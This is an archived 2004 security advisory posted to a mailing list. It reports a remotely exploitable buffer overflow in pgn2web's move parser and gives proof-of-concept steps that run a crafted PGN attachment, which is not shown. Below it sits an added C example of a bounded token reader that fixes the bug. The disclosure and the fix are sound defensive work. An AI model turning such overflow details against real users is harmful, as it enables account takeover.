Mailing-List: contact securesoftware-help@list.cr.yp.to; run by ezmlm
Delivered-To: mailing list securesoftware@list.cr.yp.to
Received: (qmail 41299 invoked by uid 1017); 15 Dec 2004 08:25:23 -0000
Date: 15 Dec 2004 08:25:23 -0000
Message-ID: <20041215082523.41298.qmail@cr.yp.to>
Mail-Followup-To: securesoftware@list.cr.yp.to, whoggarth@users.sourceforge.net
Automatic-Legal-Notices: See http://cr.yp.to/mailcopyright.html.
From: "D. J. Bernstein"
To: securesoftware@list.cr.yp.to, whoggarth@users.sourceforge.net
Subject: [remote] [control] pgn2web 0.3 process_moves overflows token buffer
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="LQksG6bCIzRHxTLp"
Content-Disposition: inline

--LQksG6bCIzRHxTLp
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Tom Palarz and Kris Kubicki, two students in my Fall 2004 UNIX Security
Holes course, have discovered a remotely exploitable security hole in
pgn2web, a converter from PGN-format chess games to web pages. I'm
publishing this notice, but all the discovery credits should be assigned
to Palarz and Kubicki.

You are at risk if you take a PGN file from an email message (or a web
page or any other source that could be controlled by an attacker) and
feed that document through pgn2web. Whoever provides the PGN file then
has complete control over your account: he can read and modify your
files, watch the programs you're running, etc.

The pgn2web documentation does not tell users to avoid taking input from
the network. In fact, one can easily find web pages offering chess games
in PGN format for public use.

Proof of concept: On an x86 computer running FreeBSD 4.10, type

   wget http://umn.dl.sourceforge.net/sourceforge/pgn2web/pgn2web-0.3.tar.gz
   gunzip < pgn2web-0.3.tar.gz | tar -xf -
   cd pgn2web
   gcc -Wall -o pgn2web pgn2web.c -DINSTALL_PATH='"./"'

to download and compile the pgn2web program, version 0.3 (current).
Then save the file 45.pgn attached to this message, and type

   ./pgn2web 45.pgn 45.html

with the unauthorized result that a file named EXPLOITED is created in
the current directory.

Here's the bug: In pgn2web.c, process_moves() uses fscanf() to read any
number of bytes into a 256-byte token array.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

--LQksG6bCIzRHxTLp
Content-Type: application/x-chess-pgn
Content-Disposition: attachment; filename="45.pgn"
Content-Transfer-Encoding: base64
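The unbounded fscanf() read the advisory describes, next to a bounded reader that keeps the same 256-byte token array, as an added example that is not pgn2web's own code. It assumes a plain "%s" conversion into the array (the shape the advisory gives; the real format string in pgn2web.c is not quoted here), and a temporary file stands in for the PGN input.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example (not pgn2web's code). The advisory says pgn2web 0.3 reads a
 * move token with fscanf() into a 256-byte array with no field width, so any
 * token longer than 255 bytes runs past the array onto whatever follows it on
 * the stack. The reader below keeps the 256-byte buffer but bounds the
 * conversion and rejects tokens that do not fit instead of truncating them. */

#define TOKEN_SIZE 256

/* Read one whitespace-delimited token into token[TOKEN_SIZE].
 * Returns 1 on success, 0 at end of input, -1 if the token is too long.
 * Vulnerable pattern from the advisory (no width):  fscanf(fp, "%s", token);
 * The width 255 must equal TOKEN_SIZE - 1 so fscanf() stores at most 255
 * characters plus the terminating NUL. */
static int read_token(FILE *fp, char token[TOKEN_SIZE])
{
    int c;
    if (fscanf(fp, "%255s", token) != 1)
        return 0;                       /* EOF or read error */
    c = fgetc(fp);
    if (c == EOF)
        return 1;                       /* token ended exactly at EOF */
    ungetc(c, fp);
    /* Hitting the width limit leaves a non-space byte unread: reject. */
    return isspace(c) ? 1 : -1;
}

/* Count the tokens in a constructed PGN movetext string; returns -1 if any
 * token exceeds the buffer. A temporary file stands in for the PGN file. */
int count_pgn_tokens(const char *movetext)
{
    char token[TOKEN_SIZE];
    FILE *fp = tmpfile();
    int n = 0, rc;
    if (fp == NULL)
        return -1;
    fputs(movetext, fp);
    rewind(fp);
    while ((rc = read_token(fp, token)) == 1)
        n++;
    fclose(fp);
    return rc == -1 ? -1 : n;
}
```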